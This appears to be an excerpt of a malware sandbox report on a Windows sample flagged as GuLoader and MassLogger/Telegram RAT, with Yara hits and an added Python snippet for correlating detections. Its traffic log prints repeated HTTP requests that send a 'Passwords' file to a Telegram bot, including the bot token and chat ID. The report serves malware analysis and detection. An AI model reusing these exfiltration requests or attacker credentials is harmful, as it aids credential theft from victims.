Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 66 31 38 30 35 31 30 63 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii:
  --===============8dd35f180510c0b
  Content-Disposition: form-data; name="document"; filename="Userdata.txt"
  Content-Type: application/x-ms-dos-executable

  ************************************************************

Timestamp: 2025-01-11 02:06:42 UTC | Bytes transferred: 347 | Direction: IN
Data:
  HTTP/1.1 401 Unauthorized
  Server: nginx/1.18.0
  Date: Sat, 11 Jan 2025 02:06:42 GMT
  Content-Type: application/json
  Content-Length: 58
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp: 2025-01-11 02:06:42 UTC | Bytes transferred: 58 | Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 26 | Source IP: 192.168.2.10 | Source Port: 49762 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: 2025-01-11 02:06:43 UTC | Bytes transferred: 294 | Direction: OUT
Data:
  POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
  Content-Type: multipart/form-data; boundary================8dd3633a7f99f46
  Host: api.telegram.org
  Content-Length: 1090
  Connection: Keep-Alive

Timestamp: 2025-01-11 02:06:43 UTC | Bytes transferred: 1090 | Direction: OUT
Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 33 33 61 37 66 39 39 66 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii:
  --===============8dd3633a7f99f46
  Content-Disposition: form-data; name="document"; filename="Userdata.txt"
  Content-Type: application/x-ms-dos-executable

  ************************************************************

Timestamp: 2025-01-11 02:06:44 UTC | Bytes transferred: 347 | Direction: IN
Data:
  HTTP/1.1 401 Unauthorized
  Server: nginx/1.18.0
  Date: Sat, 11 Jan 2025 02:06:44 GMT
  Content-Type: application/json
  Content-Length: 58
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp: 2025-01-11 02:06:44 UTC | Bytes transferred: 58 | Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 27 | Source IP: 192.168.2.10 | Source Port: 49764 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: 2025-01-11 02:06:46 UTC | Bytes transferred: 294 | Direction: OUT
Data:
  POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
  Content-Type: multipart/form-data; boundary================8dd369e576146ce
  Host: api.telegram.org
  Content-Length: 1090
  Connection: Keep-Alive

Timestamp: 2025-01-11 02:06:46 UTC | Bytes transferred: 1090 | Direction: OUT
Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 39 65 35 37 36 31 34 36 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii:
  --===============8dd369e576146ce
  Content-Disposition: form-data; name="document"; filename="Userdata.txt"
  Content-Type: application/x-ms-dos-executable

  ************************************************************

Timestamp: 2025-01-11 02:06:46 UTC | Bytes transferred: 347 | Direction: IN
Data:
  HTTP/1.1 401 Unauthorized
  Server: nginx/1.18.0
  Date: Sat, 11 Jan 2025 02:06:46 GMT
  Content-Type: application/json
  Content-Length: 58
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp: 2025-01-11 02:06:46 UTC | Bytes transferred: 58 | Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 28 | Source IP: 192.168.2.10 | Source Port: 49766 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: 2025-01-11 02:06:48 UTC | Bytes transferred: 270 | Direction: OUT
Data:
  POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
  Content-Type: multipart/form-data; boundary================8dd36efca5c9cba
  Host: api.telegram.org
  Content-Length: 1090

Timestamp: 2025-01-11 02:06:48 UTC | Bytes transferred: 1090 | Direction: OUT
Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 65 66 63 61 35 63 39 63 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii:
  --===============8dd36efca5c9cba
  Content-Disposition: form-data; name="document"; filename="Userdata.txt"
  Content-Type: application/x-ms-dos-executable

  ************************************************************

Timestamp: 2025-01-11 02:06:48 UTC | Bytes transferred: 347 | Direction: IN
Data:
  HTTP/1.1 401 Unauthorized
  Server: nginx/1.18.0
  Date: Sat, 11 Jan 2025 02:06:48 GMT
  Content-Type: application/json
  Content-Length: 58
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp: 2025-01-11 02:06:48 UTC | Bytes transferred: 58 | Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 29 | Source IP: 192.168.2.10 | Source Port: 49768 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: 2025-01-11 02:06:50 UTC | Bytes transferred: 270 | Direction: OUT
Data:
  POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
  Content-Type: multipart/form-data; boundary================8dd3759920c3fb5
  Host: api.telegram.org
  Content-Length: 1090

Timestamp: 2025-01-11 02:06:50 UTC | Bytes transferred: 1090 | Direction: OUT
Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 35 39 39 32 30 63 33 66 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii:
  --===============8dd3759920c3fb5
  Content-Disposition: form-data; name="document"; filename="Userdata.txt"
  Content-Type: application/x-ms-dos-executable

  ************************************************************

Timestamp: 2025-01-11 02:06:50 UTC | Bytes transferred: 347 | Direction: IN
Data:
  HTTP/1.1 401 Unauthorized
  Server: nginx/1.18.0
  Date: Sat, 11 Jan 2025 02:06:50 GMT
  Content-Type: application/json
  Content-Length: 58
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp: 2025-01-11 02:06:50 UTC | Bytes transferred: 58 | Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.1049770149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:52 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd37c46c893414
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 63 34 36 63 38 39 33 34 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: --===============8dd37c46c893414Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:52 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:06:52 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 31 | Source IP: 192.168.2.10 | Source Port: 49772 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:53 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd3847c2e14721
Host: api.telegram.org
Content-Length: 1090
Data Ascii: --===============8dd3847c2e14721Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:54 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:06:53 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 32 | Source IP: 192.168.2.10 | Source Port: 49774 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:55 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd38c1b36f23ea
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
Data Ascii: --===============8dd38c1b36f23eaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:55 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:06:55 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 33 | Source IP: 192.168.2.10 | Source Port: 49776 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:57 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd393cc0358b5d
Host: api.telegram.org
Content-Length: 1090
Data Ascii: --===============8dd393cc0358b5dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:57 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:06:57 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 34 | Source IP: 192.168.2.10 | Source Port: 49778 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:59 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd39b997d3f58b
Host: api.telegram.org
Content-Length: 1090
Data Ascii: --===============8dd39b997d3f58bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:59 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:06:59 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 35 | Source IP: 192.168.2.10 | Source Port: 49780 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:07:01 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd3a0842782977
Host: api.telegram.org
Content-Length: 1090
Data Ascii: --===============8dd3a0842782977Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:07:01 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:07:01 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 36 | Source IP: 192.168.2.10 | Source Port: 49782 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:07:02 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd3a8a4b2b1383
Host: api.telegram.org
Content-Length: 1090
Data Ascii: --===============8dd3a8a4b2b1383Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:07:03 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:07:03 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}



Target ID: 0
Start time: 21:04:55
Start date: 10/01/2025
Path: C:\Users\user\Desktop\4NG0guPiKA.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\4NG0guPiKA.exe"
Imagebase: 0x400000
File size: 778'465 bytes
MD5 hash: 8F02B3E31021D64ED25A599E58BC8F2F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1571921135.000000000347E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

                                                                                                          Target ID:3
                                                                                                          Start time:21:05:16
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\4NG0guPiKA.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:778'465 bytes
                                                                                                          MD5 hash:8F02B3E31021D64ED25A599E58BC8F2F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false
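Both detections above are Yara hits on memory dumps (the `.sdmp` sources), not on the file on disk, which is the practical point of this section: the GuLoader stub is found in a region of the first process, and the MassLogger, Credential Stealer and Telegram RAT rules all hit the same region of the child process (Target ID 3). The example below is added here and is not part of the Joe Sandbox report; it parses those source names to correlate the hits per process. Two fields are verifiable on this page (the first is the sandbox target ID, matching "Target ID:3", and the fourth is the base address of the dumped region); treating the fifth field as a Win32 PAGE_* protection value is an assumption of this example, and the remaining fields are left uninterpreted.

```python
import re
from collections import defaultdict

# Constructed input: the four Yara hits listed in the process section of the report.
YARA_HITS = [
    ("JoeSecurity_GuLoader_2",
     "00000000.00000002.1571921135.000000000347E000.00000040.00001000.00020000.00000000.sdmp"),
    ("JoeSecurity_MassLogger",
     "00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp"),
    ("JoeSecurity_CredentialStealer",
     "00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp"),
    ("JoeSecurity_TelegramRAT",
     "00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp"),
]

# Documented Win32 page-protection values. That the fifth dump-name field carries
# one of these is an ASSUMPTION of this example, not something the report states.
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Field layout as observed in the report's source strings; names beyond target/base are guesses.
SDMP_RE = re.compile(
    r"^(?P<target>\d{8})\.(?P<run>\d{8})\.(?P<stamp>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<f6>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


def parse_sdmp_name(name):
    """Split a memory-dump file name into target ID, region base and (assumed) protection."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox memory-dump name: {name}")
    protect = int(m["protect"], 16)
    return {
        "target": int(m["target"]),
        "base": int(m["base"], 16),
        "protect": protect,
        "executable": bool(protect & EXEC_MASK),
    }


def summarize(hits):
    """Group Yara hits by sandbox target and flag targets with a hit in executable memory."""
    by_target = defaultdict(lambda: {"rules": [], "regions": set(), "executable": False})
    for rule, source in hits:
        info = parse_sdmp_name(source)
        entry = by_target[info["target"]]
        entry["rules"].append(rule)
        entry["regions"].add(info["base"])
        entry["executable"] = entry["executable"] or info["executable"]
    return dict(by_target)


if __name__ == "__main__":
    for target, entry in sorted(summarize(YARA_HITS).items()):
        regions = ", ".join(f"{b:#x}" for b in sorted(entry["regions"]))
        flag = "executable region" if entry["executable"] else "non-executable region"
        print(f"target {target}: {', '.join(entry['rules'])} @ {regions} ({flag})")
```

Under the stated assumption the GuLoader hit at 0x347E000 in target 0 sits in PAGE_EXECUTE_READWRITE memory, the usual shape of a loader decrypting shellcode in place, while the three stealer rules in target 3 all match one PAGE_READWRITE region at 0x3326B000. Either way, a hunt that only scans files on disk would not reproduce these detections; the equivalent check in a live environment is a Yara scan of process memory.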


                                                                                                            Execution Graph

                                                                                                            Execution Coverage:20.5%
                                                                                                            Dynamic/Decrypted Code Coverage:15.8%
                                                                                                            Signature Coverage:19.6%
                                                                                                            Total number of Nodes:1451
                                                                                                            Total number of Limit Nodes:43
                                                                                                            [Execution graph node listing omitted: the interactive graph viewer exported as raw node/edge text. Nodes are function addresses in the main image (0x401000 to 0x4062xx, imagebase 0x400000) and in a second loaded module (0x10001000 to 0x10002axx), each annotated with the Win32 APIs it calls or with a count such as "18 API calls".]
